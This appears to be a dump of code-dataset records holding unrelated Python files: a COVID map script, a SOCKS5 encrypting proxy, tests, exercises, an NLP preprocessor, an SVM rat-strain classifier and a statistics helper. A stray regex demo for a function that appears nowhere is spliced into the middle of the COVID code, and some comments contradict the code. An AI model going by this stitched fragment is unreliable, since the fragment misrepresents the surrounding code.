covid_data['activeYesterday']\n\n # some fixes of city names\n covid_data.rename(inplace=True, index={\n 'Salzburg Stadt': 'Salzburg',\n 'Bruck an der Glocknerstraße': 'Bruck an der Großglocknerstraße',\n 'Fusch an der Glocknerstraße': 'Fusch an der Großglocknerstraße',\n 'Sankt Martin im Tennengebirge': 'Sankt Martin am Tennengebirge',\n 'Hollersbach': 'Hollersbach im Pinzgau',\n 'Rußbach am Pass Gschütt': 'Rußbach am Paß Gschütt'\n })\n\n create_table(covid_data)\n plot_map(covid_data, last_updated)\n\n\ndef drop_gaue(data):\n 
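The two condition shapes parsed by check_item_condition above can be exercised directly; a short, self-contained demo:

import re

m = re.match(r"(\w+) between (\w+) and (\w+)", "age between 10 and 20", re.IGNORECASE)
print(m.groups())                        # ('age', '10', '20')
m = re.match(r"([\w\s]+)([=<>]+)([\w\s]+)", "id = 1")
print([g.strip() for g in m.groups()])   # ['id', '=', '1']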
data.drop(data.index[data.index.str.endswith('- Nicht zugeordnet', na=False)], inplace=True)\n\n return data.drop([\n 'Flachgau',\n 'Tennengau',\n 'Pongau',\n 'Pinzgau',\n 'Lungau',\n ]).sort_index()\n\n\ndef color_red_green(val):\n \"\"\"\n Takes a scalar and returns a string with\n the css property `'color: red'` for negative\n strings, black 0 and green for positives.\n \"\"\"\n color = '#5fba7d' if val > 0 else 'black' if val == 0 else '#d65f5f'\n\n return 'color: %s' % color\n\n\ndef create_table(data):\n table = drop_gaue(data)[['relativeActive', 'active', 'activeChange', 'Verstorben', 'population']]\n\n table.rename(inplace=True, columns={\n 'relativeActive': '7-Tage-Inzidenz',\n 'active': 'Aktive Fälle',\n 'activeChange': 'Δ aktive Fälle',\n 'population': 'Bevölkerung',\n })\n\n html = table.style \\\n .applymap(color_red_green, subset=table.columns[2]) \\\n .bar(subset=table.columns[0], align='mid', color='#5fba7d') \\\n .bar(subset=table.columns[2], align='zero', color=['#d65f5f', '#5fba7d']) \\\n .bar(subset=table.columns[3], align='zero', color='#4d4d4d') \\\n .set_precision(2) \\\n .set_uuid('') \\\n .render()\n\n with open(report_dir + \"table.html\", 'w') as f:\n f.write(html)\n\n\ndef plot_map(data, last_updated):\n # get map\n salzburg = gpd.read_file(map_zip)\n # simplify districts\n salzburg = salzburg.dissolve(by='PG')\n\n plot_data = salzburg.join(data)[['relativeActive', 'geometry']].to_crs(epsg=3857)\n\n ax = plot_data.plot(\n column='relativeActive',\n cmap='Paired',\n figsize=(14, 10.5),\n legend=True,\n legend_kwds={'shrink': 0.8, 'alpha': 0.5},\n alpha=0.5,\n edgecolor='k',\n )\n ctx.add_basemap(ax, source=ctx.providers.Stamen.TonerLite)\n plt.axis('off')\n plt.title('7-Tages-Mittel pro 100.000 Einwohner', fontsize=20)\n plt.suptitle('zivilschutz.at\\nStand: ' + last_updated.strftime('%d.%m.%Y %H:%m'), y=0.95)\n plt.savefig(report_dir + \"aktiv.png\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":4946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"591623881","text":"for T in range(int(input())):\n v, e = list(map(int, input().split()))\n ls_e = []\n for i in range(e):\n ls_e.append(list(map(int, input().split())))\n ls_e = sorted(ls_e,key=lambda x:x[0])\n s, g = list(map(int, input().split()))\n visit = [0]*(len(ls_e)+1)\n nt_ls = [[] for i in range(v+1)]\n stack = []\n print(visit)\n for i in ls_e:\n nt_ls[i[0]] += [i[1]]\n print(nt_ls)\n stack.append(s)\n rs = 0\n while stack :\n chk = stack.pop()\n stack.extend(nt_ls[chk])\n if g in stack:\n rs = 1\n break\n print(f'#{T+1} ',end='')\n print(rs)","sub_path":"Solving_Problem/과제 스크립/4일차 - 그래프 경로.py","file_name":"4일차 - 그래프 경로.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"134812129","text":"#!/usr/bin/env python\n\n# Copyright (c) 2012 clowwindy\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all 
copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport sys\n\n\n\nimport select\nimport socketserver\nimport struct\nimport os\nimport json\nimport socket\nimport logging\nimport traceback\n\nfrom secretkeeper import SecretKeeper\n\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)-8s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S', filemode='a+')\n\n\nclass LocalProxyServer(socketserver.ThreadingMixIn, socketserver.TCPServer): # Multiple inheritance\n allow_reuse_address = False\n\n\nclass LocalProxyServerHandler(socketserver.StreamRequestHandler):\n\n\n def handle_udp_datagram(self,sock,local_udp,remote,cipher):\n try:\n logging.debug(\"Enter udp loop\")\n fdset = [sock, local_udp, remote]\n while True:\n r, w, e = select.select(fdset, [], [],1) # use select I/O multiplexing model\n\n if sock in r: # if local socket is ready for reading\n data = sock.recv(4096)\n #logging.debug(\"Sock Recv %d\" %len(data))\n if len(data) <= 0: # received all data\n break\n\n if local_udp in r:\n data, address = local_udp.recvfrom(4096)\n\n\n if remote in r: # remote socket(proxy) ready for reading\n data = remote.recv(4096)\n\n\n finally:\n try:\n logging.info(\"shutdown local tcp socket:%d:%d, local udp socket:%d:%d ,and remote socket:%d:%d\"%(sock.getsockname()[0],sock.getsockname()[1],local_udp.getsockname()[0],local_udp.getsockname()[1],remote.getsockname()[0],remote.getsockname()[1]))\n sock.shutdown(socket.SHUT_RDWR)\n remote.shutdown(socket.SHUT_RDWR)\n except:\n pass\n\n\n\n ''' RequesHandlerClass Definition '''\n def handle_tcp_stream(self, sock, remote,cipher):\n try:\n fdset = [sock, remote]\n while True:\n r, w, e = select.select(fdset, [], []) # use select I/O multiplexing model\n if sock in r: # if local socket is ready for reading\n data = sock.recv(4096)\n #logging.debug(\"Sock Recv %d\" %len(data))\n if len(data) <= 0: # received all data\n break\n data = cipher.encrypt(data)\n result = remote.sendall(data) # send data after encrypting\n\n if remote in r: # remote socket(proxy) ready for reading\n data = remote.recv(4096)\n #logging.debug(\"Remote Recv %d\" %len(data))\n if len(data) <= 0:\n break\n data = cipher.decrypt(data)\n result = sock.sendall( (data)) # send to local socket(application)\n finally:\n try:\n logging.info(\"shutdown local socket:%d:%d and remote socket:%d:%d\"%(sock.getsockname()[0],sock.getsockname()[1],remote.getsockname()[0],remote.getsockname()[1]))\n sock.shutdown(socket.SHUT_RDWR)\n remote.shutdown(socket.SHUT_RDWR)\n except:\n pass\n\n\n def connect_to_remote(self):\n logging.debug(\"Connecting remote proxy server %s %d\"%(SERVER, REMOTE_PORT))\n remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n #remote.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) # turn off Nagling\n remote.connect((SERVER, REMOTE_PORT))\n logging.debug(\"Remote proxy server connected\")\n return remote\n\n\n def parse_socks_header(self,rfile):\n data = rfile.read(4) # Forward request format: VER CMD RSV ATYP (4 bytes)\n mode = ord(data[1:2]) # CMD == 0x01 (connect)\n if 
mode != 1 and mode !=3:\n logging.warning('Unsupported mode!')\n return\n addrtype = ord(data[3:4]) # indicate destination address type\n header_to_send = data[1:2]+data[3:4]\n if addrtype == 1: # IPv4\n addr_ip = rfile.read(4) # 4 bytes IPv4 address (big endian)\n addr = socket.inet_ntoa(addr_ip)\n header_to_send += addr_ip\n elif addrtype == 3: # FQDN (Fully Qualified Domain Name)\n addr_len = (rfile.read(1)) # Domain name's Length\n if(ord(addr_len)>64):\n logging.warning('invaild address length!')\n return\n addr = rfile.read(ord(addr_len)) # Followed by domain name(e.g. www.google.com)\n header_to_send += addr_len + addr\n else:\n logging.warning('addr_type not support')\n return\n addr_port = rfile.read(2)\n header_to_send += addr_port # addr_to_send = ATYP + [Length] + dst addr/domain name + port\n port = struct.unpack('>H', addr_port)\n logging.info('%s-connecting %s:%d' % ('tcp' if mode==1 else 'udp',addr, port[0]))\n return mode,header_to_send\n\n def pack_header(self,socksheader,cipher,iv):\n socksheader = b'sock' + socksheader\n socksheader = socksheader + b'0'*(96-len(socksheader))\n socksheader = cipher.encrypt(socksheader,False)\n packet = b'GET / HTTP/1.1\\r\\n'+iv+socksheader\n return packet\n\n def handle(self):\n try:\n remote = self.connect_to_remote()\n sock = self.connection # local socket [127.1:port]\n sock.recv(512) # Sock5 Verification packet\n sock.send(b\"\\x05\\x00\") # Sock5 Response: '0x05' Version 5; '0x00' NO AUTHENTICATION REQUIRED\n mode, socksheader = self.parse_socks_header(self.rfile)\n if socksheader != None:\n iv = SecretKeeper.generate_iv()\n cipher = SecretKeeper.getCipher(KEY,iv)\n if mode == 1: #TCP Implementation\n reply = b\"\\x05\\x00\\x00\\x01\" # VER REP RSV ATYP\n reply += socket.inet_aton('0.0.0.0') + struct.pack(\">H\", 62222) # listening on 2222 on all addresses of the machine, including the loopback(127.0.0.1)\n self.wfile.write(reply) # response packet\n packet = self.pack_header(socksheader,cipher,iv)\n remote.sendall(packet)\n self.handle_tcp_stream(sock, remote,cipher)\n elif mode == 3: #UDP Implementation\n local_udp = socket.socket( socket.AF_INET, socket.SOCK_DGRAM ) # Create an udp socket\n local_udp.bind( ('', 0) ) # Local udp socket\n reply = b\"\\x05\\x00\\x00\\x01\" # VER REP RSV ATYP\n reply += socket.inet_aton('127.0.0.1') + struct.pack(\">H\", local_udp.getsockname()[1]) # listening on 2222 on all addresses of the machine, including the loopback(127.0.0.1)\n self.wfile.write(reply) # response packet\n packet = self.pack_header(socksheader,cipher,iv)\n remote.sendall(packet)\n self.handle_udp_datagram(sock,local_udp,remote,cipher)\n except Exception as e:\n traceback.print_exc()\n logging.warning(e)\n\n\nif __name__ == '__main__':\n logging.info(\"Tinysocks 0.1b\")\n os.chdir(os.path.dirname(__file__) or '.')\n\n with open('config.json', 'r') as f:\n config = json.load(f)\n SERVER = config['server']\n REMOTE_PORT = config['remote_port']\n PORT = config['local_port']\n PASSWORD = config['password']\n SecretKeeper.init_secret_keeper()\n KEY= SecretKeeper.generate_key(PASSWORD)\n server = LocalProxyServer(('', PORT), LocalProxyServerHandler) # s.bind(('', 80)) specifies that the socket is reachable by any address the machine happens to have.\n logging.info(\"starting server at port %d ...\" % PORT)\n server.serve_forever()\n\n","sub_path":"local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":9142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} 
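The SOCKS5 framing that the local.py record above documents in comments (VER CMD RSV ATYP, a variable-length address whose shape is selected by ATYP, then a big-endian port) can be exercised standalone. Below is a minimal sketch of that parsing under the same RFC 1928 layout; parse_socks5_request and the sample request bytes are illustrative inventions of this note, and the record's SecretKeeper/cipher wrapping is deliberately left out:

import struct

def parse_socks5_request(buf):
    # VER CMD RSV ATYP, per RFC 1928; this sketch only parses the request header.
    ver, cmd, _rsv, atyp = buf[0], buf[1], buf[2], buf[3]
    assert ver == 5, "only SOCKS version 5 is handled in this sketch"
    if atyp == 1:                  # IPv4: four raw address bytes
        addr = ".".join(str(b) for b in buf[4:8])
        port_off = 8
    elif atyp == 3:                # FQDN: one length byte, then the name
        n = buf[4]
        addr = buf[5:5 + n].decode("ascii")
        port_off = 5 + n
    else:                          # IPv6 (ATYP 4) is out of scope here
        raise ValueError("unsupported ATYP %d" % atyp)
    (port,) = struct.unpack(">H", buf[port_off:port_off + 2])
    return cmd, addr, port

# A CONNECT request for example.com:443 using the domain-name address type:
req = b"\x05\x01\x00\x03" + bytes([11]) + b"example.com" + struct.pack(">H", 443)
print(parse_socks5_request(req))  # -> (1, 'example.com', 443)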
+{"seq_id":"243566958","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport unittest\nfrom pytest import raises\nfrom tweet_process.util import reading_config\nfrom tweet_process.job_tweet import JobTweet\nfrom tweet_process.domain_extractor import TweetDomainExtractor\n\n\nclass TweetDomainExtractorTestCase(unittest.TestCase):\n\n def setUp(self):\n config = reading_config()\n self.domain_extractor = TweetDomainExtractor(config)\n self.job_tweet = JobTweet(\n job_id=82567,\n landing_url=\"https://jobs.cvshealth.com/job/-/-/5770/1831139\")\n\n def test_process_return(self):\n res = self.domain_extractor.process(self.job_tweet)\n self.assertTrue(res)\n\n def test_process_result(self):\n self.domain_extractor.process(self.job_tweet)\n domain = \"cvshealth.com\"\n self.assertEqual(self.job_tweet.domain, domain)\n\n def test_process_attr_error(self):\n with raises(AttributeError):\n self.job_tweet.domain\n\n\n# vim: ts=4 sw=4 sts=4 expandtab\n","sub_path":"tests/test_domain_extractor.py","file_name":"test_domain_extractor.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"550246430","text":"class DomesticAnimals:\n weight = 10 # kg\n height = 50 # cm\n favorite_food = None\n animal_name = None\n animal_group = None\n\n def __init__(self, animal_group, animal_name, favorite_food, height, weight):\n self.animal_group = animal_group\n self.animal_name = animal_name\n self.favorite_food = favorite_food\n self.height = height\n self.weight = weight\n\n def eat(self, value):\n self.weight += value\n\n\nclass LargeAnimal(DomesticAnimals):\n def give_meat(self):\n print(\"You have meat\", self.animal_group, \" - \", self.weight, \" kg\")\n self.weight = 0\n\n\nclass BirdAnimal(DomesticAnimals):\n def give_feather(self):\n print(\"You have feather\", self.animal_group)\n self.weight -= 1\n\n\nx1 = LargeAnimal(\"cows\", \"Буренка\", \"Сено\", 100, 500)\n# print(x1.weight)\nx1.give_meat()\n# print(x1.weight)\n\nx2 = LargeAnimal(\"goats\", \"Буренка\", \"Сено\", 100, 500)\nprint(x2.animal_group)\nx2.animal_group = \"cows\"\nprint(x2.animal_group)\n\ny1 = BirdAnimal(\"duck\", \"ГуГу\", \"трава\", 40, 20)\n# print(y1.weight)\ny1.give_feather()\n# print(y1.weight)\n","sub_path":"text_prog.py","file_name":"text_prog.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"290657568","text":"from setuptools import setup, Extension\n\nglver = Extension(\n\t'glver.glver',\n\tlibraries = ['User32'],\n\tsources = ['source/glver.cpp']\n) \n\nsetup(\n\tname = 'glver',\n\tversion = '1.0.0',\n\tdescription = 'Python: Determine OpenGL version.',\n\tauthor = 'Szabolcs Dombi',\n\tauthor_email = 'cprogrammer1994@gmail.com',\n\turl = 'https://github.com/cprogrammer1994/glver',\n\text_modules = [glver],\n\tpackages = ['glver'],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"49011557","text":"from typing import List\nfrom copy import copy\n\n\nclass Solution:\n def canThreePartsEqualSum(self, A: List[int]) -> bool:\n # n = len(A)\n # s1, s2 = copy(A), copy(A)\n # i, j = 1, n - 2\n # while i < n and j > -1:\n # s1[i] += s1[i - 1]\n # s2[j] += s2[j + 1]\n # i, j = i + 1, j - 1\n #\n # _sum = s2[0]\n # if _sum % 3 != 0:\n # return False\n # tmp = _sum // 3\n #\n # for p in range(n):\n 
# if s1[p] == tmp:\n # for q in range(n - 1, p, -1):\n # if s2[q] == s1[p]:\n # return True\n # return False\n\n sum_all = sum(A)\n if sum_all % 3 != 0:\n return False\n div = sum_all // 3\n\n tmp, cnt = 0, 0\n for x in A:\n tmp += x\n if tmp == div:\n tmp, cnt = 0, cnt + 1\n return cnt == 3\n\n\ndef test_solution():\n assert Solution().canThreePartsEqualSum([0, 2, 1, -6, 6, -7, 9, 1, 2, 0, 1])\n assert not Solution().canThreePartsEqualSum([0, 2, 1, -6, 6, 7, 9, -1, 2, 0, 1])\n assert Solution().canThreePartsEqualSum([3, 3, 6, 5, -2, 2, 5, 1, -9, 4])\n","sub_path":"leetcode_1013/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"233949754","text":"import nltk, re #operator, pprint\nfrom nltk import word_tokenize\nfrom nltk.corpus import stopwords\n# from os import listdir\n# from os.path import isfile, isdir, join\nimport numpy\nimport sys, csv, codecs# getopt, codecs, tim/e, os, csv\nfrom collections import Counter\n\n\nchars = ['{','}','#','%','&','\\(','\\)','\\[','\\]','<','>',',', '!', '.', ';', \n'?', '*', '\\\\', '\\/', '~', '_','|','=','+','^',':','\\\"','\\'','@','-']\n\ndef stem(word):\n regexp = r'^(.*?)(ing|ly|ed|ious|ies|ive|es|s|ment)?$'\n stem, suffix = re.findall(regexp, word)[0]\n return stem\n\ndef read_bagofwords_dat(myfile):\n bagofwords = numpy.genfromtxt('myfile.csv',delimiter=',')\n return bagofwords\n\ndef find_bigrams(input_list):\n return [a + b for (a,b) in zip(input_list, input_list[1:])]\n\ndef tokenize_corpus(train=True):\n porter = nltk.PorterStemmer() # also lancaster stemmer\n wnl = nltk.WordNetLemmatizer()\n stopWords = stopwords.words(\"english\")\n docs = []\n classes = []\n positive_words = Counter()\n negative_words = Counter()\n\n for line in sys.stdin:\n theclass = line.rsplit()[-1]\n raw = line.decode('latin1')\n raw = ' '.join(raw.rsplit()[1:-1])\n # remove noisy characters; tokenize\n raw = re.sub('[%s]' % ''.join(chars), ' ', raw)\n tokens = word_tokenize(raw)\n tokens = [w.lower() for w in tokens]\n tokens = [w for w in tokens if w not in stopWords]\n tokens = [wnl.lemmatize(t) for t in tokens]\n tokens = [porter.stem(t) for t in tokens] \n tokens = Counter(tokens + find_bigrams(tokens))\n docs.append(tokens)\n if int(theclass) == 1: positive_words += tokens \n else: negative_words += tokens \n classes.append(theclass)\n return docs, classes, positive_words, negative_words\n\ndef find_wordcounts(docs, vocab):\n bagofwords = numpy.zeros(shape=(len(docs),len(vocab)), dtype=numpy.uint8)\n vocabIndex={}\n for i in range(len(vocab)):\n vocabIndex[vocab[i]]=i\n\n for i in range(len(docs)):\n doc = docs[i]\n\n for t in doc:\n index_t=vocabIndex.get(t)\n if index_t>=0:\n bagofwords[i,index_t]=bagofwords[i,index_t]+1\n\n # print \"Finished find_wordcounts for:\", len(docs), \"docs\"\n return(bagofwords)\n\ndocs, classes, positive_words, negative_words = tokenize_corpus()\n\nvocabfile = open('vocab.txt', 'r')\nvocab = [line.rstrip('\\n') for line in vocabfile]\nvocabfile.close()\n\noutfile= open('data/test_classes.txt', 'w')\noutfile.write(\"\\n\".join(classes))\noutfile.close()\n\nwith open(\"data/bow_test.csv\", \"wb\") as f:\n writer = csv.writer(f)\n writer.writerows(find_wordcounts(docs, vocab))\noutfile = open(\"test_classes.txt\", 
'w')","sub_path":"preptest.py","file_name":"preptest.py","file_ext":"py","file_size_in_byte":2680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"552331164","text":"# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\nLoads the first dataset and performs the first method.\r\n\r\nsql_connection module is needed to import data.\r\n\"\"\"\r\n\r\nfrom sql_connection import engine as engine # This module is not included in repo, to keep data private.\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.metrics import classification_report, confusion_matrix\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.model_selection import GridSearchCV\r\n#from matplotlib import colors\r\n\r\n# Loads a dataframe used to map the rat strain to rat ID.\r\nstrain_map = pd.read_sql(\r\n \"SELECT `id`, `strain` FROM `ratExperiment`\",\r\n con=engine\r\n )\r\n\r\n# Define a dictionary that maps rat strains to a colour. The color is kept consistent throughot the whole work.\r\ncolors_map = {'SHR': '#F5793A', 'WT': '#A95AA1', 'HanSD': '#0F2080', 'TGR': '#85C0F9'}\r\n\r\n# Define dictionary encoder. Most of the methods encode strings automaticaly, but there are exeptions.\r\nencoder = {'SHR': '0', 'WT': '1', 'HanSD': '2', 'TGR': '3'}\r\n\r\n# Names of the fields of the dataframe. Used for properly labeling axes and names of the plots.\r\ncolumn_title = {'pulsePressure': 'Pulse Pressure (mmHg)',\r\n 'diastolicBP': 'Diastolic BP (mmHg)',\r\n 'meanBP': 'Blood Pressure (mmHg)',\r\n 'systolicBP': 'Systolic BP (mmHg)',\r\n 'heartRate': 'Heart Rate (BPM)',\r\n 'activity': 'Activity (Movement Per Minute)'}\r\n\r\n\r\ndef main():\r\n \"\"\"Wrap the main process separate.\"\"\"\r\n from control_select import control_df\r\n\r\n def plot_day_night_scatter(column_name, rats_avgs):\r\n \"\"\"\r\n Create a scatter plot with dark phase averages on X axis and light phase averages on the Y axis.\r\n\r\n Parameters\r\n ----------\r\n column_name : string\r\n Selct which column to plot.\r\n rats_avgs : pandas.dataframe\r\n Dataframe of aggregate data.\r\n\r\n\r\n \"\"\"\r\n plt.figure()\r\n rats_avgs = rats_avgs.join(strain_map.set_index('id'))\r\n plt.scatter(column_name + 'dark',\r\n column_name + 'light',\r\n data=rats_avgs,\r\n c=rats_avgs['strain'].map(colors_map))\r\n plt.title(column_title[column_name])\r\n plt.xlabel('Dark Phase')\r\n plt.ylabel('Light Phase')\r\n plt.show()\r\n plt.savefig('rats_avgs_' + str(column_name) + '.png',\r\n dpi=300,\r\n transparent=True)\r\n\r\n def calc_avg_one_column(column_name, kresli=True):\r\n \"\"\"\r\n Calculate averages separate for light and dark phase.\r\n\r\n Parameters\r\n ----------\r\n column_name : string\r\n Selct which column to use.\r\n kresli : boolean, optional\r\n If the scatter plot of that column should be plotted. 
The default is True.\r\n\r\n Returns\r\n -------\r\n rats_avgs : pandas.dataframe\r\n calculated average values per rat.\r\n\r\n \"\"\"\r\n pomocna = control_df[['idRatExperiment', column_name, 'lightIntensity']]\r\n pivot_rats = pomocna.groupby(['idRatExperiment', 'lightIntensity']).mean()\r\n pivot_rats = pivot_rats.reset_index(level=[0, 1])\r\n X = pivot_rats[['idRatExperiment', column_name]][pivot_rats.lightIntensity == 0]\r\n Y = pivot_rats[['idRatExperiment', column_name]][pivot_rats.lightIntensity == 150]\r\n rats_avgs = X.set_index('idRatExperiment').join(Y.set_index('idRatExperiment'), lsuffix='dark', rsuffix='light')\r\n\r\n if kresli:\r\n plot_day_night_scatter(column_name, rats_avgs)\r\n\r\n return rats_avgs\r\n\r\n def calc_avg_one_column_multiple(kresli=True, *args):\r\n \"\"\"\r\n Call calc_avg_one_column() function on multiple columns.\r\n\r\n Parameters\r\n ----------\r\n kresli : boolean, optional\r\n If the scatter plots of that columns should be plotted. The default is True.\r\n *args : string\r\n Names of the columns requested.\r\n\r\n Returns\r\n -------\r\n x : pandas.dataframe\r\n Rats with the corresponding average values. All the needed features are now prepared.\r\n\r\n \"\"\"\r\n iterargs = iter(args) # Goes through the multipe arguments (column names)\r\n x = calc_avg_one_column(next(iterargs), kresli) # Calls the function to calculate the averages.\r\n for column_name in iterargs:\r\n x = x.join(calc_avg_one_column(column_name, kresli))\r\n\r\n x = x.join(strain_map.set_index('id'))\r\n\r\n return x\r\n\r\n table_avg = calc_avg_one_column_multiple(False, # We don't want to plot the scatterplots now\r\n 'pulsePressure',\r\n 'diastolicBP',\r\n 'meanBP',\r\n 'systolicBP',\r\n 'heartRate',\r\n 'activity')\r\n\r\n # Transform the features from pandas.df into numpy.array\r\n X = np.array(table_avg[['pulsePressuredark', 'pulsePressurelight',\r\n 'diastolicBPdark', 'diastolicBPlight',\r\n 'meanBPdark', 'meanBPlight',\r\n 'systolicBPdark', 'systolicBPlight',\r\n 'heartRatedark', 'heartRatelight',\r\n 'activitydark', 'activitylight']])\r\n\r\n # Prepare the labels, transform into numpy.array\r\n y = np.ravel(np.array(table_avg[['strain']]))\r\n\r\n # Split the dataset into the training and test\r\n X_train, X_test, y_train, y_test = train_test_split(X, y,\r\n test_size=0.3,\r\n random_state=42)\r\n # Scale(standardize) the features. Transform both of the sets, but train only on training set.\r\n # We treat the test set as not seen before the training.\r\n scaler = StandardScaler()\r\n scaler.fit(X_train)\r\n X_train = scaler.transform(X_train)\r\n X_test = scaler.transform(X_test)\r\n\r\n # Prepare the grid of parameters for grid-search. 
We want to find the best C parameter.\r\n # Kernel is left from when we tried other kernels, before deciding to keep it simple.\r\n param_grid = {\r\n 'C': [2**(2*i-1) for i in range(-2,9)],\r\n 'kernel': ['linear']\r\n }\r\n\r\n # Perform the grid search.\r\n clf = GridSearchCV(SVC(),\r\n param_grid,\r\n scoring='f1_micro',\r\n n_jobs = -1)\r\n clf.fit(X_train, y_train)\r\n print(\"Best parameter (CV score=%0.3f):\" % clf.best_score_)\r\n print(clf.best_params_)\r\n\r\n # Use the model trained with the best value of hyperparameter C, to validate on test set.\r\n pred = clf.best_estimator_.predict(X_test)\r\n print(confusion_matrix(y_test, pred))\r\n print(classification_report(y_test, pred))\r\n\r\n\r\n\r\n\r\n# =============================================================================\r\n# # Plot exemplary SVM\r\n# # Exemplary figure to show SVM in 2D\r\n#\r\n# y = np.ravel(np.array(table_avg[['strain']]))\r\n# X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30, random_state=42)\r\n#\r\n# clf = svm.SVC(kernel='linear')\r\n# clf.fit(X_train[:, [5,9]], y_train)\r\n# y_pred = clf.predict(X_test[:,[5,9]])\r\n# print(confusion_matrix(y_test,y_pred))\r\n# print(classification_report(y_test,y_pred))\r\n#\r\n# fig = plt.figure()\r\n# ax = plt.gca()\r\n# x_min, x_max = X_test[:,5].min() - 1, X_test[:,5].max() + 1\r\n# y_min, y_max = X_test[:,9].min() - 1, X_test[:,9].max() + 1\r\n# xx, yy = np.meshgrid(np.arange(x_min, x_max, (x_max-x_min)/1000), np.arange(y_min, y_max, (y_max-y_min)/1000))\r\n# Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])\r\n# #Z = clf.decision_function(np.c_[xx.ravel(), yy.ravel()])\r\n# Z = Z.reshape(xx.shape)\r\n# cmap = colors.ListedColormap(['#F5793A','#A95AA1','#0F2080','#85C0F9'])\r\n# bounds = [0, 0.9, 1.9, 2.9, 3.9]\r\n# norm = colors.BoundaryNorm(bounds, cmap.N)\r\n# ax.pcolor(xx, yy, (np.vectorize(encoder.get)(Z)).astype(int), cmap=cmap, norm=norm)\r\n# ax.scatter(X_test[:,5], X_test[:,9], c=(np.vectorize(encoder.get)(y_test)).astype(int), cmap=cmap, norm=norm, s=40, edgecolors='k')\r\n# ax.xaxis.label.set_fontsize(10)\r\n# ax.yaxis.label.set_fontsize(10)\r\n# ax.set_xlabel('Blood Pressure (mmHg)')\r\n# ax.set_ylabel('Heart Rate (BPM)')\r\n# #plt.savefig('svm_heartRate.png', dpi=300, transparent=True)\r\n# =============================================================================\r\n\r\n\r\n# Wrapper for executing the main script.\r\n# We do this to ensure that the long process of training the ML model is not executed when importing the strain map.\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"method1_complete.py","file_name":"method1_complete.py","file_ext":"py","file_size_in_byte":9039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"222668836","text":"## Medidas de Dispersão e Tendências\r\n## 1º) Este programa em python recebe um variável do tipo \"numpy\" e realiza a conversão da mesma para o tipo \"array\".\r\n## 2º) Importa a biblioteca \"Pandas\" e realiza os seguintes cálculos:\r\n## media, desvioPadrao, desvioAbsoluto, mediana, quantil, moda, minimo, maximo, amplitude, variancia, tabAux , dadosNump\r\n##\r\ndef medidasDispersaotendencia (serieOriginal):\r\n #print (\"tam serie=\", len(serieOriginal))\r\n import pandas as pd\r\n serieConvertArray = []\r\n #print(\"serieOriginal=\", serieOriginal)\r\n for item in serieOriginal:\r\n serieConvertArray.append(float(item))\r\n\r\n serie = pd.Series(serieConvertArray)\r\n media = serie.mean()\r\n mediana = 
serie.median()\r\n quantil = serie.quantile()\r\n moda = serie.mode()\r\n minimo = serie.min()\r\n maximo = serie.max()\r\n amplitude = maximo - minimo\r\n variancia = serie.var()\r\n desvioPadrao = serie.std()\r\n desvioAbsoluto = serie.mad()\r\n\r\n\r\n\r\n from numpy import array\r\n serieNump = array(serieConvertArray)\r\n\r\n # print(\"metricas\", media, desvioPadrao, desvioAbsoluto, mediana, quantil) #, moda, minimo, maximo, amplitude, variancia)\r\n # print(\"min\", minimo, \"max\", maximo, \"ampli\", amplitude, \"var\",variancia)\r\n #exit()\r\n return media, desvioPadrao, desvioAbsoluto, mediana, quantil, minimo, maximo, amplitude, variancia, serieConvertArray , serieNump , moda\r\n\r\n\r\n# Medias de Tendência\r\n# ===================\r\n# Média : medida de tendência central que indica o valor onde estão concentrados os dados de um conjunto de valores;\r\n# Mediana : valor que separa a metade superior da metade inferior de uma distribuição de dados, 